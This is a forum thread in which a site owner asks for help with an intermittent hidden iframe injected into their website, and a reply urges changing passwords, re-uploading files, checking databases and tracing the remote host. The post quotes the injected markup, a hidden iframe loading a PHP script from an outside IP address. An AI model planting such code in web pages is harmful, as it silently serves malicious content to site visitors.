Iframe injection attack

This appears really random , it does not have logic when it is appearing . It may disapear after a few refreshes , or it may be not there for a 1-2 days but after that it appears again.

<div style="visibility:hidden"><iframe src="http://65. 126. 238. 126/scrp.php" width=10   height=10></iframe></div>

My server seem to be secure , i have checked all the files for viruses and malware and stuff like that . But it shows on the website anyway

If somebody encounter this problem as well please post what you have done in order to get rid of it .

Thank you
Sergiu C.


Obviously, your server is NOT secure!

IMMEDIATELY change your cPanel and FTP passwords to something strong (http://strongpasswordgenerator.com has good hints and can generate near-impossible-to-crack passwords for you but be sure to use at least 11 characters which include both cases, digits and special characters - spaces, too, if permitted by your host) THEN DELETE all your files and only then, upload to refresh. If you’re using databases, dump EVERYTHING and look through it for a table which doesn’t belong and inappropriate values in the table fields (especially for login records).

FWIW, resolves to hu3.hostutopia.net. If that’s not you, then they are the ones hacking you (report them to your local police and your host with a DEMAND that they pursue the hacker, too). If that IS you, look for the scrp.php file and see what that’s sending to the hacker.